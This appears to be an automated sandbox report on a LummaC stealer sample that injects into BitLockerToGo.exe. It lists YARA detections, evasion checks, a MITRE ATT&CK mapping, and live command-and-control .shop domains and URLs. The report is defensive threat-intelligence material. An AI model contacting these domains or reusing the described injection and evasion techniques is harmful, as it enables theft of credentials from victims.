Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029AB280	5_2_029AB280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029AA2AE	5_2_029AA2AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02969230	5_2_02969230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0296139D	5_2_0296139D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029673F0	5_2_029673F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0298A324	5_2_0298A324
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0296135B	5_2_0296135B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0297037F	5_2_0297037F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02965360	5_2_02965360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029880AF	5_2_029880AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A90F0	5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02961000	5_2_02961000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02967030	5_2_02967030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02993024	5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0298E19C	5_2_0298E19C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A97BB	5_2_029A97BB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029687C0	5_2_029687C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0298E740	5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02963770	5_2_02963770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02983770	5_2_02983770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0296A480	5_2_0296A480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0298E419	5_2_0298E419
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02988446	5_2_02988446
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0297F467	5_2_0297F467
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0296B460	5_2_0296B460
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A0580	5_2_029A0580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029985A0	5_2_029985A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02996A80	5_2_02996A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A7BB0	5_2_029A7BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A8BE0	5_2_029A8BE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A5850	5_2_029A5850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02971870	5_2_02971870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0296A940	5_2_0296A940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0298EE86	5_2_0298EE86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02967E20	5_2_02967E20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02973F86	5_2_02973F86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02992FA9	5_2_02992FA9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0296AFD0	5_2_0296AFD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0298BF1C	5_2_0298BF1C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0299EF10	5_2_0299EF10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0296BF70	5_2_0296BF70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02996C90	5_2_02996C90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A9CF0	5_2_029A9CF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_0298ECF4	5_2_0298ECF4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A9C00	5_2_029A9C00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A4D00	5_2_029A4D00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02969D78	5_2_02969D78

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0296CAF0 appears 55 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0297D8A0 appears 164 times

Source: iq2HxA0SLw.exe

Static PE information: Number of sections : 12 > 10

Source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe, 00000000.00000002.1864836224.00007FF6A9EAF000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe	Binary or memory string: OriginalFileName vs iq2HxA0SLw.exe

Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@2/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 5_2_0299FAD0 CoCreateInstance,

5_2_0299FAD0

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe

File created: C:\Users\Public\Libraries\faboa.scif

Jump to behavior

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe

File opened: C:\Windows\system32\74a18233676dde97608ee6471dc0c9b5cb8eb3e6e4c279aabd8f7060ccfe423dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: iq2HxA0SLw.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: iq2HxA0SLw.exe

ReversingLabs: Detection: 58%

Source: iq2HxA0SLw.exe	String found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine .localhostwsarecvmsgwsasendmsgIP addressunixpacket netGo = RIPEMD-160ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtraSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1POSTALCODEexecerrdotSYSTEMROOT but have one_outputUSERDOMAINlocal-addrUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityequivalentHost: %s
Source: iq2HxA0SLw.exe	String found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine RegSetValueExWinternal error.in-addr.arpa.unknown mode: unreachable: /log/filter.go/log/helper.godata truncated
Source: iq2HxA0SLw.exe	String found in binary or memory: ... omitting > closed by </add_dir_header.WithDeadline(<not Stringer>Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMaccept-charsetcontent-length{$} not at endempty wildcardparsing %q: %wNot Acceptableheap_sys_bytesSubConn(id:%d)"OUT_OF_RANGE"ALREADY_EXISTSreserved_rangefield_presenceLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeGetSystemTimesinvalid kind: \.+*?()\|[]{}^$
Source: iq2HxA0SLw.exe	String found in binary or memory: net/addrselect.go
Source: iq2HxA0SLw.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: iq2HxA0SLw.exe	String found in binary or memory: google.golang.org/grpc@v1.64.1/internal/balancerload/load.go
Source: iq2HxA0SLw.exe	String found in binary or memory: YePeApZaEl/load.go

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe

File read: C:\Users\user\Desktop\iq2HxA0SLw.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\iq2HxA0SLw.exe "C:\Users\user\Desktop\iq2HxA0SLw.exe"
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: iq2HxA0SLw.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: iq2HxA0SLw.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: iq2HxA0SLw.exe

Static file information: File size 19231232 > 1048576

Source: iq2HxA0SLw.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x65d200
Source: iq2HxA0SLw.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xb2da00

Source: iq2HxA0SLw.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp

Source: iq2HxA0SLw.exe

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6336

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: iq2HxA0SLw.exe, 00000000.00000002.1861210283.0000024538558000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: iq2HxA0SLw.exe, 00000000.00000002.1861210283.0000024538558000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

API call chain: ExitProcess graph end node

graph_5-19831

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 5_2_029A7130 LdrInitializeThunk,

5_2_029A7130

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: covvercilverow.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: surroundeocw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: abortinoiwiam.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: pumpkinkwquo.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: priooozekw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: deallyharvenw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: defenddsouneuw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: racedsuitreow.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: pianoswimen.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000			Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AA3008			Jump to behavior

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Jump to behavior

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Queries volume information: C:\Users\user\Desktop\iq2HxA0SLw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Go Injector

Source: Yara match	File source: iq2HxA0SLw.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: iq2HxA0SLw.exe PID: 2992, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: iq2HxA0SLw.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: iq2HxA0SLw.exe PID: 2992, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	11 Input Capture	11 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Input Capture	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
iq2HxA0SLw.exe	58%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
priooozekw.shop	100%	Avira URL Cloud	malware
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
http://crl.m	0%	Avira URL Cloud	safe
surroundeocw.shop	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/api	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/api$&	100%	Avira URL Cloud	malware
racedsuitreow.shop	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/xy	100%	Avira URL Cloud	malware
covvercilverow.shop	100%	Avira URL Cloud	malware
pianoswimen.shop	100%	Avira URL Cloud	malware
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://racedsuitreow.shop/api=	100%	Avira URL Cloud	malware
abortinoiwiam.shop	100%	Avira URL Cloud	malware
https://github.com/golang/protobuf/issues/1609):	0%	Avira URL Cloud	safe
pumpkinkwquo.shop	100%	Avira URL Cloud	malware
defenddsouneuw.shop	100%	Avira URL Cloud	malware
deallyharvenw.shop	100%	Avira URL Cloud	malware
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
racedsuitreow.shop	104.21.37.97	true	true		unknown
pianoswimen.shop	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
priooozekw.shop	true	Avira URL Cloud: malware	unknown
https://racedsuitreow.shop/api	true	Avira URL Cloud: malware	unknown
surroundeocw.shop	true	Avira URL Cloud: malware	unknown
racedsuitreow.shop	true	Avira URL Cloud: malware	unknown
pianoswimen.shop	true	Avira URL Cloud: malware	unknown
covvercilverow.shop	true	Avira URL Cloud: malware	unknown
pumpkinkwquo.shop	true	Avira URL Cloud: malware	unknown
abortinoiwiam.shop	true	Avira URL Cloud: malware	unknown
deallyharvenw.shop	true	Avira URL Cloud: malware	unknown
defenddsouneuw.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://racedsuitreow.shop/xy	BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.m	BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
